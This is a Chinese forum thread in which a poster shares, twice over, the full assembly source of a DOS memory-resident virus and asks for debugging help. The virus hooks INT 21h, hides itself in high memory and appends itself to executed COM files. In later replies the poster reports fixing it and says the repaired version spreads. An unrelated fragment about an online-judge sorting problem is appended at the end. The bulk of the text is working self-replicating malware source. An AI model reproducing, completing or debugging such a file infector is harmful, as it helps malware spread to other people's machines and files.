21,458
社区成员
发帖
与我相关
我的任务
分享帮忙看一下,实在想不出为什么会出问题
实在看不出在It_not_Install_Check之后,为什么连 mov ah, 2 都会错误,完整程序如下
; a infected file with my virii ;-)
; This is a resident virus which intercept the Int 21h,
; and when a COM is executed, the COM file will be infected.
; 20050303 by daineng@nj.cpsecure
VirusSeg segment byte public
assume cs:VirusSeg, ds:VirusSeg
SAddSize equ offset Superadd_End - offset Superadd_Start
ResdSize equ offset Resident_End
org 100h
Resident_Virii proc far
Parasite_Start:
; this victim's first 3 bytes was replace with
; the fellow 3 bytes
db 0e9h ; jmp near to Para_Instrument
dw 4
;dw 4cb4h ; it's original program
;db 0cdh
db 21h
;..........................
;..........................
;..........................
;..........................
;..........................
;..........................
Resident_Start:
Superadd_Start: ; The part which will be superadd to a victim
virid db 64h, 6eh
sjmp db 0e9h
Para_Instrument:
call Calc_DeltaOFF
Calc_DeltaOFF: ; Calculate the delta offset
pop bp
sub bp, offset Calc_DeltaOFF
lea si, [bp+offset first3bytes]
lea di, [bp+offset first3byte3]
movsw
movsb
Installation_Check:
mov ax, 0fbcch
int 21h
cmp bx, 0fbcch ; Installation Check
jnz Install_Virii ; If not, then install it
jmp Restore_This_Victim
Install_Virii:
; Save the Old Interrupt 21h
push ds
xor ax, ax
mov ds, ax
lds bx, ds:[21h*4]
mov word ptr cs:[bp+old_int21], bx
mov word ptr cs:[bp+old_int21+2], ds
pop ds
; Obtain the Max Memory have been allocated
mov ah, 4ah
mov bx, 0ffffh ; Assume ES initially equals the segment of the PSP
int 21h ; BX = MCB size (total available paragraphs to program)
; Allocate the high memory
mov ah, 4ah
;sub bx, (Resident_End-Resident_Start+15)/16+1
sub bx, (Resident_End-Parasite_Start+15+100h)/16+1
int 21h
mov ah, 48h ; Allocate memory
;mov bx, (Resident_End-Resident_Start+15)/16
mov bx, (Resident_End-Parasite_Start+15+100h)/16
int 21h
mov es, ax ; ES = High Memory Segment
push ds
dec ax
mov ds, ax
mov byte ptr ds:[0], 'Z' ; probably not needed
mov word ptr ds:[1], 8 ; Mark DOS as owner of MCB
pop ds
; Copy the virus to high memory
;lea si, [bp+offset Resident_Start]
xor si, si
xor di, di
;mov cx, (Resident_End-Resident_Start)/2
mov cx, (Resident_End-Parasite_Start+100h)/2
rep movsw ; DS:SI --> ES:DI
; Swap Interrupt Vectors
cli
push ds
xor ax, ax
mov ds, ax
;mov word ptr ds:[21h*4], Resident_Code_Bgn - Resident_Start
mov word ptr ds:[21h*4], offset Resident_Code_Bgn
mov ds:[21h*4+2], es
pop ds
sti
Install_Completed:
Restore_This_Victim:
lea bx, [bp+offset first3byte3]
mov di, 100h
mov ax, word ptr [bx]
mov word ptr [di], ax
mov ah, byte ptr [bx+2]
mov byte ptr [di+2], ah
; Goto this victim original start
mov bp, 100h
jmp bp
Resident_Code_Bgn: ; The intercepted int 21h will start here
; Check if Installation Check be called
cmp ax, 0fbcch
jnz It_not_Install_Check
It_Is_Install_Check:
xchg ax, bx
iret
It_not_Install_Check:
; Check if the EXEC be called
push ax
push dx
;mov ah, 2
;mov dl, 'd'
;pushf
;call dword ptr old_int21
pop dx
pop ax
;cmp ah, 4bh
;jz Intercept_Start
jmp dword ptr old_int21
Intercept_Start:
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
; Check if it is a COM file
mov ax, ds
mov es, ax
mov di, dx
mov al, 0
mov cx, 13
repne scasb
sub di, 3
cmp word ptr es:[di], 'OC'
jnz Infect_Over
cmp byte ptr es:[di+2], 'M'
jnz Infect_Over
; Open the executing file
mov ax, 3d02h ; Open file for read/write access
pushf ; DS:DX -> ASCIZ program name
call dword ptr old_int21
jc Infect_Over
mov bx, ax ; BX = File Handle
mov ax, cs
mov ds, ax
; Check if the file have been infected by me
mov ah, 3fh
lea dx, first3bytes
mov cx, 3
pushf
call dword ptr old_int21
cmp byte ptr [first3bytes], 0e9h
jne Infect_It
; Detect Virus ID
xor cx, cx
mov dx, word ptr [first3bytes+1]
mov ax, 4200h
pushf
call dword ptr old_int21
lea dx, viriiiiiiid
mov cx, 2
mov ah, 3fh
pushf
call dword ptr old_int21
cmp word ptr viriiiiiiid, 6e64h
jne Infect_It
Close_The_File:
mov ah, 3eh
pushf
call dword ptr old_int21
Infect_Over:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp dword ptr old_int21
Infect_It: ; Infect the new victim
xor dx, dx
xor cx, cx
mov ax, 4202h
pushf
call dword ptr old_int21
cmp dx, 0
jne Close_The_File
cmp ah, 0fdh
jae Close_The_File
mov word ptr viriiiiiiid, ax ; Save the victim original size
mov ah, 40h
lea dx, Superadd_Start
mov cx, SAddSize
pushf
call dword ptr old_int21
jc Close_The_File
mov ax, 4200h
xor cx, cx
xor dx, dx
pushf
call dword ptr old_int21
mov ah, 40h
lea dx, sjmp
mov cx, 1
pushf
call dword ptr old_int21
mov ah, 40h
lea dx, viriiiiiiid
mov cx, 2
pushf
call dword ptr old_int21
jmp Close_The_File
old_int21 dd ?
first3bytes db 0b4h, 4ch, 0cdh
first3byte3 db 0, 0, 0
viriiiiiiid db 0, 0
strMsg db "hello, baby!", 0ah, 0dh, '$', 0
Resident_Code_End:
Superadd_End:
Resident_End:
Resident_Virii endp
VirusSeg ends
end Resident_Virii
; a infected file with my virii ;-)
; This is a resident virus which intercept the Int 21h,
; and when a COM is executed, the COM file will be infected.
; 20050303 by daineng@nj.cpsecure
VirusSeg segment byte public
assume cs:VirusSeg, ds:VirusSeg
SAddSize equ offset Superadd_End - offset Superadd_Start
ResdSize equ offset Resident_End
org 100h
Resident_Virii proc far
Parasite_Start:
; this victim's first 3 bytes was replace with
; the fellow 3 bytes
db 0e9h ; jmp near to Para_Instrument
dw 4
;dw 4cb4h ; it's original program
;db 0cdh
db 21h
;..........................
;..........................
;..........................
;..........................
;..........................
;..........................
Resident_Start:
Superadd_Start: ; The part which will be superadd to a victim
virid db 64h, 6eh
sjmp db 0e9h
Para_Instrument:
call Calc_DeltaOFF
Calc_DeltaOFF: ; Calculate the delta offset
pop bp
sub bp, offset Calc_DeltaOFF
lea si, [bp+offset first3bytes]
lea di, [bp+offset first3byte3]
movsw
movsb
Installation_Check:
mov ax, 0fbcch
int 21h
cmp bx, 0fbcch ; Installation Check
jnz Install_Virii ; If not, then install it
jmp Restore_This_Victim
Install_Virii:
; Save the Old Interrupt 21h
push ds
xor ax, ax
mov ds, ax
lds bx, ds:[21h*4]
mov word ptr cs:[bp+old_int21], bx
mov word ptr cs:[bp+old_int21+2], ds
pop ds
; Obtain the Max Memory have been allocated
mov ah, 4ah
mov bx, 0ffffh ; Assume ES initially equals the segment of the PSP
int 21h ; BX = MCB size (total available paragraphs to program)
; Allocate the high memory
mov ah, 4ah
;sub bx, (Resident_End-Resident_Start+15)/16+1
sub bx, (Resident_End-Parasite_Start+15+100h)/16+1
int 21h
mov ah, 48h ; Allocate memory
;mov bx, (Resident_End-Resident_Start+15)/16
mov bx, (Resident_End-Parasite_Start+15+100h)/16
int 21h
mov es, ax ; ES = High Memory Segment
push ds
dec ax
mov ds, ax
mov byte ptr ds:[0], 'Z' ; probably not needed
mov word ptr ds:[1], 8 ; Mark DOS as owner of MCB
pop ds
; Copy the virus to high memory
;lea si, [bp+offset Resident_Start]
xor si, si
xor di, di
;mov cx, (Resident_End-Resident_Start)/2
mov cx, (Resident_End-Parasite_Start+100h)/2
rep movsw ; DS:SI --> ES:DI
; Swap Interrupt Vectors
cli
push ds
xor ax, ax
mov ds, ax
;mov word ptr ds:[21h*4], Resident_Code_Bgn - Resident_Start
mov word ptr ds:[21h*4], offset Resident_Code_Bgn
mov ds:[21h*4+2], es
pop ds
sti
Install_Completed:
Restore_This_Victim:
lea bx, [bp+offset first3byte3]
mov di, 100h
mov ax, word ptr [bx]
mov word ptr [di], ax
mov ah, byte ptr [bx+2]
mov byte ptr [di+2], ah
; Goto this victim original start
mov bp, 100h
jmp bp
Resident_Code_Bgn: ; The intercepted int 21h will start here
; Check if Installation Check be called
cmp ax, 0fbcch
jnz It_not_Install_Check
It_Is_Install_Check:
xchg ax, bx
iret
It_not_Install_Check:
; Check if the EXEC be called
push ax
push dx
;mov ah, 2
;mov dl, 'd'
;pushf
;call dword ptr old_int21
pop dx
pop ax
;cmp ah, 4bh
;jz Intercept_Start
jmp dword ptr old_int21
Intercept_Start:
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
; Check if it is a COM file
mov ax, ds
mov es, ax
mov di, dx
mov al, 0
mov cx, 13
repne scasb
sub di, 3
cmp word ptr es:[di], 'OC'
jnz Infect_Over
cmp byte ptr es:[di+2], 'M'
jnz Infect_Over
; Open the executing file
mov ax, 3d02h ; Open file for read/write access
pushf ; DS:DX -> ASCIZ program name
call dword ptr old_int21
jc Infect_Over
mov bx, ax ; BX = File Handle
mov ax, cs
mov ds, ax
; Check if the file have been infected by me
mov ah, 3fh
lea dx, first3bytes
mov cx, 3
pushf
call dword ptr old_int21
cmp byte ptr [first3bytes], 0e9h
jne Infect_It
; Detect Virus ID
xor cx, cx
mov dx, word ptr [first3bytes+1]
mov ax, 4200h
pushf
call dword ptr old_int21
lea dx, viriiiiiiid
mov cx, 2
mov ah, 3fh
pushf
call dword ptr old_int21
cmp word ptr viriiiiiiid, 6e64h
jne Infect_It
Close_The_File:
mov ah, 3eh
pushf
call dword ptr old_int21
Infect_Over:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp dword ptr old_int21
Infect_It: ; Infect the new victim
xor dx, dx
xor cx, cx
mov ax, 4202h
pushf
call dword ptr old_int21
cmp dx, 0
jne Close_The_File
cmp ah, 0fdh
jae Close_The_File
mov word ptr viriiiiiiid, ax ; Save the victim original size
mov ah, 40h
lea dx, Superadd_Start
mov cx, SAddSize
pushf
call dword ptr old_int21
jc Close_The_File
mov ax, 4200h
xor cx, cx
xor dx, dx
pushf
call dword ptr old_int21
mov ah, 40h
lea dx, sjmp
mov cx, 1
pushf
call dword ptr old_int21
mov ah, 40h
lea dx, viriiiiiiid
mov cx, 2
pushf
call dword ptr old_int21
jmp Close_The_File
old_int21 dd ?
first3bytes db 0b4h, 4ch, 0cdh
first3byte3 db 0, 0, 0
viriiiiiiid db 0, 0
strMsg db "hello, baby!", 0ah, 0dh, '$', 0
Resident_Code_End:
Superadd_End:
Resident_End:
Resident_Virii endp
VirusSeg ends
end Resident_Virii
...全文
请发表友善的回复…
发表回复
Allen 2005-03-07
- 打赏
- 举报
这个问题我也不清楚,实际上我对调试的原理不大清楚的
VxD1 2005-03-07
- 打赏
- 举报
我也有帖结不了
请教trw2000中的load装入调试和普通的调试有什么区别?
请教trw2000中的load装入调试和普通的调试有什么区别?
VxD1 2005-03-07
- 打赏
- 举报
我来接分
Allen 2005-03-07
- 打赏
- 举报
这个程序写错了,只能感染一次文件,被感染的文件没有感染能力,不过现在已经改过来了。鉴于是病毒,程序就不再贴了
Allen 2005-03-07
- 打赏
- 举报
自己找出答案了,如果不assume ds或者assume ds:nothing就可以了,分给不了自己,谁进来接?
Allen 2005-03-04
- 打赏
- 举报
错误是执行时遇到无效指令
(注:编译出来是可被Norton发现是病毒,虽然无害,只是复制自己,并不破坏,但还请妥善处理)
(注:编译出来是可被Norton发现是病毒,虽然无害,只是复制自己,并不破坏,但还请妥善处理)
各位在看我日志的大牛,如果您有一丢丢小空余时间,然后,又觉得没有什么具体的事情好做,想要轻松一下,放松一下大脑的话,麻烦帮忙看一下是哪里的问题吧。 在OJ验证的话,只能通过一半的数据。 检查过排序算法
